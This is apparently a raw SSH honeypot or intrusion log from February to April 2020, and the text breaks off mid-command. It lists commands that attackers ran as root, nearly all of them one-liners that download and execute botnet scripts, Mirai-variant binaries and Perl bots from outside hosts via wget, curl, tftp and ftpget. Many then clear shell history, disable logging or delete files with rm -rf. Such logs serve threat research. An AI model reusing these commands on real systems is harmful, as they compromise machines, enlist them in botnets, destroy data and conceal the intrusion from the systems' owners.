rm -rf * cd /tmp || cd /run || cd / wget http://68.183.44.22/mixbins.sh chmod 777 mixbins.sh sh mixbins.sh tftp 68.183.44.22 -c get mixtftp1.sh chmod 777 mixtftp1.sh sh mixtftp1.sh tftp -r mixtftp2.sh -g 68.183.44.22 chmod 777 mixtftp2.sh sh mixtftp2.sh rm -rf mixbins.sh mixtftp1.sh mixtftp2.sh rm -rf * From 159.203.64.91 22-Feb-2020 13:01:46 ssh2 root Exec cd /tmp; wget http://45.148.10.86/dafuqman111/gh0st0a1s0as2d12.x86; curl -O http://45.148.10.86/dafuqman111/gh0st0a1s0as2d12.x86; cat gh0st0a1s0as2d12.x86 > ssh-asdsadaupdater; chmod +x *; ./ssh-asdsadaupdater rooted cd /tmp wget http://45.148.10.86/dafuqman111/gh0st0a1s0as2d12.x86 curl -O http://45.148.10.86/dafuqman111/gh0st0a1s0as2d12.x86 cat gh0st0a1s0as2d12.x86 > ssh-asdsadaupdater chmod +x * ./ssh-asdsadaupdater rooted From 193.214.67.142 24-Feb-2020 16:57:46 ssh2 root Exec echo "cd /tmp; wget http://46.246.41.25/wget.sh || curl http://46.246.41.25/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp wget http://46.246.41.25/wget.sh || curl http://46.246.41.25/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 94.23.203.37 24-Feb-2020 20:01:39 ssh2 root Exec uname -snrvo; uptime -p uname -snrvo uptime -p From 82.205.2.123 27-Feb-2020 23:30:53 ssh2 root Exec From 82.205.2.123 27-Feb-2020 23:31:32 ssh2 root Exec free -m From 82.205.2.123 27-Feb-2020 23:31:43 ssh2 root Exec ls From 46.101.184.111 29-Feb-2020 19:41:38 ssh2 root Exec cd /tmp; wget http://45.148.10.86/as12a0s/z2s234.x86; cat z2s234.x86 > ssh-updater; chmod +x *; ./ssh-updater rooted cd /tmp wget http://45.148.10.86/as12a0s/z2s234.x86 cat z2s234.x86 > ssh-updater chmod +x * ./ssh-updater rooted From 83.209.173.60 1-Mar-2020 14:52:20 ssh2 root Exec /bin/sh NIGGA || /bin/busybox NIGGA /bin/sh NIGGA || /bin/busybox NIGGA From 83.209.173.60 2-Mar-2020 07:08:59 ssh2 root Exec echo "cat /proc/1/mountinfo" | sh echo "cat /proc/1/mountinfo" | sh From 41.234.66.22 3-Mar-2020 08:13:41 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.114.82.179/snype.sh; chmod 777 snype.sh; sh snype.sh; tftp 93.114.82.179 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 93.114.82.179; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://93.114.82.179/snype.sh chmod 777 snype.sh sh snype.sh tftp 93.114.82.179 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 93.114.82.179 chmod 777 tftp2.sh sh tftp2.sh rm -rf * From 188.166.163.246 4-Mar-2020 19:23:36 ssh2 root Exec cd /tmp; wget http://45.148.10.86/dafuqman111/gh0st0a1s0as2d12.x86; cat gh0st0a1s0as2d12.x86 > ssh-asdsadaupdater; chmod +x *; ./ssh-asdsadaupdater rooted cd /tmp wget http://45.148.10.86/dafuqman111/gh0st0a1s0as2d12.x86 cat gh0st0a1s0as2d12.x86 > ssh-asdsadaupdater chmod +x * ./ssh-asdsadaupdater rooted From 91.250.242.12 4-Mar-2020 20:03:49 ssh2 root Exec ls /dev/udp ls /dev/udp From 45.148.10.175 5-Mar-2020 17:13:46 ssh2 root Exec cd /tmp; wget http://45.148.10.86/as12a0s/z2s234.x86; cat z2s234.x86 > ssh-updater; chmod +x *; ./ssh-updater servers cd /tmp wget http://45.148.10.86/as12a0s/z2s234.x86 cat z2s234.x86 > ssh-updater chmod +x * ./ssh-updater servers From 223.83.254.246 6-Mar-2020 08:04:22 ssh2 root wget http://119.3.124.143:8080/.32 chmod +x .32 ./.32 From 41.234.66.22 8-Mar-2020 13:02:07 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.114.82.179/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 93.114.82.179 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://93.114.82.179/SnOoPy.sh chmod 777 * sh SnOoPy.sh tftp -g 93.114.82.179 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c From 41.234.66.22 9-Mar-2020 11:52:26 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 35.243.252.51/boty.pl ; perl boty.pl ; rm -rf bot* ; history -c cat /etc/issue cd /tmp wget 35.243.252.51/boty.pl perl boty.pl rm -rf bot* history -c From 157.230.123.253 14-Mar-2020 01:46:34 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.95/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86; cat d4mnasdasd4mn.x86 > 0s234154y5dthge4; chmod +x *; ./0s234154y5dthge4 NEWROOTS; rm -rf *; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.148.10.95/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86 cat d4mnasdasd4mn.x86 > 0s234154y5dthge4 chmod +x * ./0s234154y5dthge4 NEWROOTS rm -rf * history -c From 125.111.13.204 14-Mar-2020 16:15:57 ssh2 root Exec echo "cd /tmp; wget http://46.246.63.195/wget.sh || curl http://46.246.63.195/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp wget http://46.246.63.195/wget.sh || curl http://46.246.63.195/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 167.172.138.77 15-Mar-2020 21:27:27 ssh2 root Exec cd /dev/shm ; curl -O https://like-configurations.000webhostapp.com/.info ; chmod +x .info ; ./.info ; rm -rf .info ; cd ; rm -rf .bash_history ; history -c cd /dev/shm curl -O https://like-configurations.000webhostapp.com/.info chmod +x .info ./.info rm -rf .info cd rm -rf .bash_history history -c From 41.234.66.22 18-Mar-2020 16:45:24 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 34.68.115.66/boty.pl ; perl boty.pl ; rm -rf bot* ; history -c cat /etc/issue cd /tmp wget 34.68.115.66/boty.pl perl boty.pl rm -rf bot* history -c From 167.71.57.61 19-Mar-2020 06:33:58 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.95/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86; cat d4mnasdasd4mn.x86 > 0q22315dqsd; chmod +x *; ./0q22315dqsd NEWROOTS; rm -rf *; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.148.10.95/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86 cat d4mnasdasd4mn.x86 > 0q22315dqsd chmod +x * ./0q22315dqsd NEWROOTS rm -rf * history -c From 41.234.66.22 20-Mar-2020 23:01:15 ssh2 root Exec cat /etc/issue ; cd /tmp ; rm -rf x86 ; wget 34.68.115.66/x86 ; chmod 777 x86 ; ./x86 ; rm -rf x86 ; history -c cat /etc/issue cd /tmp rm -rf x86 wget 34.68.115.66/x86 chmod 777 x86 ./x86 rm -rf x86 history -c From 41.234.66.22 22-Mar-2020 10:11:37 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://93.114.82.176/botnetbins.sh; chmod 777 botnetbins.sh; sh botnetbins.sh; tftp 93.114.82.176 -c get botnettftp1.sh; chmod 777 botnettftp1.sh; sh botnettftp1.sh; tftp -r botnettftp2.sh -g 93.114.82.176; chmod 777 botnettftp2.sh; sh botnettftp2.sh; rm -rf botnetbins.sh botnettftp1.sh botnettftp2.sh; rm -rf * ; history -c cat /etc/issue cd /tmp || cd /run || cd / wget http://93.114.82.176/botnetbins.sh chmod 777 botnetbins.sh sh botnetbins.sh tftp 93.114.82.176 -c get botnettftp1.sh chmod 777 botnettftp1.sh sh botnettftp1.sh tftp -r botnettftp2.sh -g 93.114.82.176 chmod 777 botnettftp2.sh sh botnettftp2.sh rm -rf botnetbins.sh botnettftp1.sh botnettftp2.sh rm -rf * history -c From 41.234.66.22 23-Mar-2020 06:49:36 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://93.114.82.176/MiraiVariant.x86 ; chmod 777 MiraiVariant.x86 ; ./MiraiVariant.x86 ; rm -rf Mirai* ; history -c cat /etc/issue cd /tmp || cd /run || cd / wget http://93.114.82.176/MiraiVariant.x86 chmod 777 MiraiVariant.x86 ./MiraiVariant.x86 rm -rf Mirai* history -c From 41.234.66.22 24-Mar-2020 08:56:24 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 93.114.82.176/Pandoras_Box/pandora.x86 ; chmod 777 pandora.x86 ; ./pandora.x86 ; rm -rf pandora* ; history -c cat /etc/issue cd /tmp wget 93.114.82.176/Pandoras_Box/pandora.x86 chmod 777 pandora.x86 ./pandora.x86 rm -rf pandora* history -c From 207.180.227.177 27-Mar-2020 23:49:02 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 185.164.72.248/x86 ; chmod 777 x86 ; ./x86 ; rm -rf x86 ; history -c cat /etc/issue cd /tmp wget 185.164.72.248/x86 chmod 777 x86 ./x86 rm -rf x86 history -c From 106.54.16.240 28-Mar-2020 00:51:25 ssh2 root Exec wget nasapaul.com/v.py && python2 v.py wget nasapaul.com/v.py python2 v.py From 45.95.168.245 28-Mar-2020 02:25:25 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86; cat d4mnasdasd4mn.x86 > 0q22315dqsd; chmod +x *; ./0q22315dqsd COVID19; rm -rf *; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.242/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86 cat d4mnasdasd4mn.x86 > 0q22315dqsd chmod +x * ./0q22315dqsd COVID19 rm -rf * history -c From 41.234.66.22 28-Mar-2020 13:02:50 ssh2 root Exec cat /etc/issue ; cd /tmp ; rm -rf x86 ; wget 93.114.82.176/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c cat /etc/issue cd /tmp rm -rf x86 wget 93.114.82.176/bot.pl perl bot.pl rm -rf bot* history -c From 41.234.66.22 29-Mar-2020 23:14:38 ssh2 root Exec cat /etc/issue ; cd /tmp ; rm -rf bot.pl ; wget 93.114.82.155/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c cat /etc/issue cd /tmp rm -rf bot.pl wget 93.114.82.155/bot.pl perl bot.pl rm -rf bot* history -c From 45.95.168.247 30-Mar-2020 16:16:06 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.246/upperdater.sh; cat upperdater.sh > newssh10243121; chmod +x newssh10243121; sh newssh10243121; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.246/upperdater.sh cat upperdater.sh > newssh10243121 chmod +x newssh10243121 sh newssh10243121 history -c From 195.154.164.235 30-Mar-2020 22:21:32 ssh2 root Exec cd /dev/shm ; curl -O sticfi.000webhostapp.com/abc ; chmod +x abc ; ./abc ; rm -rf abc ; cd ; rm -rf .bash_history ; history -c cd /dev/shm curl -O sticfi.000webhostapp.com/abc chmod +x abc ./abc rm -rf abc cd rm -rf .bash_history history -c From 142.4.212.119 31-Mar-2020 07:06:01 ssh2 root Exec cat /proc/version cat /proc/version From 213.202.233.221 31-Mar-2020 14:46:42 ssh2 root Exec uname -a nproc uname -a nproc From 45.95.168.245 1-Apr-2020 06:07:45 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86; cat d4mnasdasd4mn.x86 > 0s234154y5dthge4; chmod +x *; ./0s234154y5dthge4 COVID19; rm -rf *; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.242/dlrdlrdlrdlr00001/d4mnasdasd4mn.x86 cat d4mnasdasd4mn.x86 > 0s234154y5dthge4 chmod +x * ./0s234154y5dthge4 COVID19 rm -rf * history -c From 109.96.110.180 3-Apr-2020 13:47:08 ssh2 root ls free -mt passwd wget nasapaul.com/ninfo ls perl test.pl yum install perl apt-get install perl perl test.pl ls wget ls yum install passwd apt-get install passwd passwd sudo su perl python cat /proc/cpuinfo password From 109.96.110.180 3-Apr-2020 14:07:37 ssh2 root ls w free- mt free -mt wget wget nasapaul.com/v.py From 3.93.78.191 3-Apr-2020 14:10:19 ssh2 root Exec uname -a ; lscpu uname -a lscpu free -mt cat /proc/cpuinfo From 3.93.78.191 3-Apr-2020 14:11:06 ssh2 root Exec uname -a ; lscpu uname -a lscpu wget arhivead1tz.tk/scan.zip wget arhivead1tz.tk/scan.zip w From 45.95.168.243 4-Apr-2020 02:03:26 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.95.168.243/snype.sh; chmod 777 snype.sh; sh snype.sh; tftp 45.95.168.243 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.95.168.243; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.95.168.243/snype.sh chmod 777 snype.sh sh snype.sh tftp 45.95.168.243 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 45.95.168.243 chmod 777 tftp2.sh sh tftp2.sh rm -rf * From 112.196.68.117 4-Apr-2020 06:15:39 ssh2 root Exec cat /proc/*/mounts cat /proc/*/mounts From 159.203.90.161 4-Apr-2020 17:30:32 ssh2 root Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /tmp;/dev/shm;cd /var/tmp;rm -rf kik.pl;wget -q 128.199.224.178/wp-admin/images/kik.pl || curl -s -O -f 128.199.224.178/wp-admin/images/kik.pl;perl kik.pl;rm -rf kik.* uname -a unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 cd /tmp /dev/shm cd /var/tmp rm -rf kik.pl wget -q 128.199.224.178/wp-admin/images/kik.pl || curl -s -O -f 128.199.224.178/wp-admin/images/kik.pl perl kik.pl rm -rf kik.* From 84.88.40.36 5-Apr-2020 18:45:46 ssh2 root Exec cat /etc/issue ; cd /tmp ; rm -rf bot.pl ; wget 51.38.244.192/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c cat /etc/issue cd /tmp rm -rf bot.pl wget 51.38.244.192/bot.pl perl bot.pl rm -rf bot* history -c From 45.95.168.251 6-Apr-2020 15:53:17 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.250/0203333/k0zk0z.x86; cat k0zk0z.x86 > 0cx1c12; chmod +x 0cx1c12; ./0cx1c12 ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.250/0203333/k0zk0z.x86 cat k0zk0z.x86 > 0cx1c12 chmod +x 0cx1c12 ./0cx1c12 ROOTED history -c From 51.89.224.140 6-Apr-2020 21:23:52 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 188.212.100.2/x86 ; chmod 777 x86 ; ./x86 ; ; rm -rf x86 ; history -c ; wget 188.212.100.2/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 188.212.100.2/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; echo nitemaxwashere > nitemaxwashere cat /etc/issue cd /tmp wget 188.212.100.2/x86 chmod 777 x86 ./x86 rm -rf x86 history -c wget 188.212.100.2/bot.pl perl bot.pl rm -rf bot.pl curl -O 188.212.100.2/bot.pl perl bot.pl rm -rf bot.pl history -c echo nitemaxwashere > nitemaxwashere From 45.95.168.248 6-Apr-2020 23:45:47 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.246/xz888000/a7mad.x86; cat a7mad.x86 > newssh10243121; chmod +x newssh10243121; ./newssh10243121 ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.246/xz888000/a7mad.x86 cat a7mad.x86 > newssh10243121 chmod +x newssh10243121 ./newssh10243121 ROOTED history -c From 195.231.8.111 7-Apr-2020 00:10:29 ssh2 root Exec wget http://107.173.251.124/x86; chmod 777 x86; ./x86 ROOTS wget http://107.173.251.124/x86 chmod 777 x86 ./x86 ROOTS From 104.41.153.74 7-Apr-2020 21:42:01 ssh2 root Exec cat /etc/issue ; payload cat /etc/issue payload Exec cat /etc/issue ; payload cat /etc/issue payload From 51.91.140.218 8-Apr-2020 08:30:18 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 188.212.100.2/x86 ; chmod 777 x86 ; ./x86 ; history -c ; wget 188.212.100.2/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 188.212.100.2/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; echo nitemaxwashere > nitemaxwashere cat /etc/issue cd /tmp wget 188.212.100.2/x86 chmod 777 x86 ./x86 history -c wget 188.212.100.2/bot.pl perl bot.pl rm -rf bot.pl curl -O 188.212.100.2/bot.pl perl bot.pl rm -rf bot.pl history -c echo nitemaxwashere > nitemaxwashere From 51.91.140.218 8-Apr-2020 19:11:47 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://188.212.100.2/Pandora.sh; curl -O http://188.212.100.2/Pandora.sh; chmod 777 Pandora.sh; sh Pandora.sh; tftp 188.212.100.2 -c get Pandora.sh; chmod 777 Pandora.sh; sh Pandora.sh; tftp -r Pandora2.sh -g 188.212.100.2; chmod 777 Pandora2.sh; sh Pandora2.sh; ftpget -v -u anonymous -p anonymous -P 21 188.212.100.2 Pandora1.sh Pandora1.sh; sh Pandora1.sh; rm -rf Pandora.sh Pandora.sh Pandora2.sh Pandora1.sh; rm -rf * ; echo nite a fost aici sclaviloooooor <3 vpsu a fost urcat pe botnetul meu :( - Much Love BaBy > nitemaxwashere ; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://188.212.100.2/Pandora.sh curl -O http://188.212.100.2/Pandora.sh chmod 777 Pandora.sh sh Pandora.sh tftp 188.212.100.2 -c get Pandora.sh chmod 777 Pandora.sh sh Pandora.sh tftp -r Pandora2.sh -g 188.212.100.2 chmod 777 Pandora2.sh sh Pandora2.sh ftpget -v -u anonymous -p anonymous -P 21 188.212.100.2 Pandora1.sh Pandora1.sh sh Pandora1.sh rm -rf Pandora.sh Pandora.sh Pandora2.sh Pandora1.sh rm -rf * echo nite a fost aici sclaviloooooor <3 vpsu a fost urcat pe botnetul meu :( - Much Love BaBy > nitemaxwashere history -c From 194.180.224.150 9-Apr-2020 00:09:13 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.124/drvbot.sh; curl -O http://194.180.224.124/drvbot.sh; chmod 777 drvbot.sh; sh drvbot.sh; tftp 194.180.224.124 -c get drvbot.sh; chmod 777 drvbot.sh; sh drvbot.sh; tftp -r drvbot2.sh -g 194.180.224.124; chmod 777 drvbot2.sh; sh drvbot2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.124 drvbot1.sh drvbot1.sh; sh drvbot1.sh; rm -rf drvbot.sh drvbot.sh drvbot2.sh drvbot1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.180.224.124/drvbot.sh curl -O http://194.180.224.124/drvbot.sh chmod 777 drvbot.sh sh drvbot.sh tftp 194.180.224.124 -c get drvbot.sh chmod 777 drvbot.sh sh drvbot.sh tftp -r drvbot2.sh -g 194.180.224.124 chmod 777 drvbot2.sh sh drvbot2.sh ftpget -v -u anonymous -p anonymous -P 21 194.180.224.124 drvbot1.sh drvbot1.sh sh drvbot1.sh rm -rf drvbot.sh drvbot.sh drvbot2.sh drvbot1.sh rm -rf * From 45.95.168.248 9-Apr-2020 09:43:35 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.246/xz888000/a7mad.x86; cat a7mad.x86 > newssh10243121; chmod +x newssh10243121; ./newssh10243121 ROOTED2; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.246/xz888000/a7mad.x86 cat a7mad.x86 > newssh10243121 chmod +x newssh10243121 ./newssh10243121 ROOTED2 history -c From 51.91.140.218 10-Apr-2020 00:25:36 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://188.212.100.2/sensi.sh; curl -O http://188.212.100.2/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 188.212.100.2 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 188.212.100.2; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 188.212.100.2 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://188.212.100.2/sensi.sh curl -O http://188.212.100.2/sensi.sh chmod 777 sensi.sh sh sensi.sh tftp 188.212.100.2 -c get sensi.sh chmod 777 sensi.sh sh sensi.sh tftp -r sensi2.sh -g 188.212.100.2 chmod 777 sensi2.sh sh sensi2.sh ftpget -v -u anonymous -p anonymous -P 21 188.212.100.2 sensi1.sh sensi1.sh sh sensi1.sh rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh rm -rf * From 195.231.3.230 10-Apr-2020 22:52:47 ssh2 root Exec wget http://192.3.193.251/x86; chmod 777 x86; ./x86 ROOTS wget http://192.3.193.251/x86 chmod 777 x86 ./x86 ROOTS From 46.97.168.84 12-Apr-2020 04:08:42 ssh2 root w cat /proc/cpuinfo cat /proc/cpuinfo ls -a cd cat /etc/issue cd .ssh ls -a cd .ssh ls -a cat reglas.pl lastlog wget cd /tmp ks -a ls -a pwd dir From 46.97.168.84 12-Apr-2020 04:20:30 ssh2 root useradd john adduser john From 134.209.92.110 12-Apr-2020 06:14:16 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.39.185.214/bins/x86; curl -O http://193.39.185.214/bins/x86; cat x86 > gucci; chmod +x *; ./gucci ssh.exploit cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.39.185.214/bins/x86 curl -O http://193.39.185.214/bins/x86 cat x86 > gucci chmod +x * ./gucci ssh.exploit From 155.138.220.148 12-Apr-2020 14:23:33 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://140.82.8.73/Beastmode.sh; curl -O http://140.82.8.73/Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp 140.82.8.73 -c get Beastmode.sh; chmod 777 Beastmode.sh; sh Beastmode.sh; tftp -r Beastmode2.sh -g 140.82.8.73; chmod 777 Beastmode2.sh; sh Beastmode2.sh; ftpget -v -u anonymous -p anonymous -P 21 140.82.8.73 Beastmode1.sh Beastmode1.sh; sh Beastmode1.sh; rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://140.82.8.73/Beastmode.sh curl -O http://140.82.8.73/Beastmode.sh chmod 777 Beastmode.sh sh Beastmode.sh tftp 140.82.8.73 -c get Beastmode.sh chmod 777 Beastmode.sh sh Beastmode.sh tftp -r Beastmode2.sh -g 140.82.8.73 chmod 777 Beastmode2.sh sh Beastmode2.sh ftpget -v -u anonymous -p anonymous -P 21 140.82.8.73 Beastmode1.sh Beastmode1.sh sh Beastmode1.sh rm -rf Beastmode.sh Beastmode.sh Beastmode2.sh Beastmode1.sh rm -rf * From 104.244.73.16 13-Apr-2020 15:33:34 ssh2 root Exec cd /tmp; wget http://ionage.theworkpc.com:8088/sshd.sh; curl -O http://ionage.theworkpc.com:8088/sshd.sh; sh sshd.sh; rm -rf sshd.sh cd /tmp wget http://ionage.theworkpc.com:8088/sshd.sh curl -O http://ionage.theworkpc.com:8088/sshd.sh sh sshd.sh rm -rf sshd.sh From 62.171.142.113 13-Apr-2020 16:24:27 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://140.82.8.73/update.sh; curl -O http://140.82.8.73/update.sh; chmod 777 update.sh; sh update.sh; tftp 140.82.8.73 -c get update.sh; chmod 777 update.sh; sh update.sh; tftp -r update2.sh -g 140.82.8.73; chmod 777 update2.sh; sh update2.sh; ftpget -v -u anonymous -p anonymous -P 21 140.82.8.73 update1.sh update1.sh; sh update1.sh; rm -rf update.sh update.sh update2.sh update1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://140.82.8.73/update.sh curl -O http://140.82.8.73/update.sh chmod 777 update.sh sh update.sh tftp 140.82.8.73 -c get update.sh chmod 777 update.sh sh update.sh tftp -r update2.sh -g 140.82.8.73 chmod 777 update2.sh sh update2.sh ftpget -v -u anonymous -p anonymous -P 21 140.82.8.73 update1.sh update1.sh sh update1.sh rm -rf update.sh update.sh update2.sh update1.sh rm -rf * From 178.128.211.250 13-Apr-2020 16:50:06 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/x05010/888fff999.x86; cat 888fff999.x86 > 12q1q3dfggf; chmod +x 12q1q3dfggf; ./12q1q3dfggf COVID20; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.242/x05010/888fff999.x86 cat 888fff999.x86 > 12q1q3dfggf chmod +x 12q1q3dfggf ./12q1q3dfggf COVID20 history -c From 134.122.127.161 14-Apr-2020 11:42:06 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/x05010/888fff999.x86; cat 888fff999.x86 > 12q1q3dfggf; chmod +x 12q1q3dfggf; ./12q1q3dfggf UnstableZombieArmy01; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.242/x05010/888fff999.x86 cat 888fff999.x86 > 12q1q3dfggf chmod +x 12q1q3dfggf ./12q1q3dfggf UnstableZombieArmy01 history -c From 51.91.140.218 14-Apr-2020 15:00:56 ssh2 root Exec cat /etc/issue ; cd /tmp ; rm -rf bot* ; wget 41.110.24.29/bot.pl ; perl bot.pl ; rm -rf bot* ; curl -O 41.110.24.29/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c cat /etc/issue cd /tmp rm -rf bot* wget 41.110.24.29/bot.pl perl bot.pl rm -rf bot* curl -O 41.110.24.29/bot.pl perl bot.pl rm -rf bot* history -c From 167.99.172.18 14-Apr-2020 19:41:37 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/x05010/888fff999.x86; cat 888fff999.x86 > 0x1x1x12q; chmod +x 0x1x1x12q; ./0x1x1x12q UnstableZombieArmy03; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.242/x05010/888fff999.x86 cat 888fff999.x86 > 0x1x1x12q chmod +x 0x1x1x12q ./0x1x1x12q UnstableZombieArmy03 history -c From 134.209.165.47 14-Apr-2020 19:42:06 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/x05010/888fff999.x86; cat 888fff999.x86 > 0x1x1x1a2q; chmod +x 0x1x1x1a2q; ./0x1x1x1a2q UnstableZombieArmy02; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.242/x05010/888fff999.x86 cat 888fff999.x86 > 0x1x1x1a2q chmod +x 0x1x1x1a2q ./0x1x1x1a2q UnstableZombieArmy02 history -c From 68.183.196.84 14-Apr-2020 20:41:40 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/x05010/888fff999.x86; cat 888fff999.x86 > 0x1x1x12q; chmod +x 0x1x1x12q; ./0x1x1x12q UnstableZombieArmy07; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.242/x05010/888fff999.x86 cat 888fff999.x86 > 0x1x1x12q chmod +x 0x1x1x12q ./0x1x1x12q UnstableZombieArmy07 history -c From 41.110.24.29 14-Apr-2020 23:20:55 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://195.144.21.176/sensi.sh; curl -O http://195.144.21.176/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 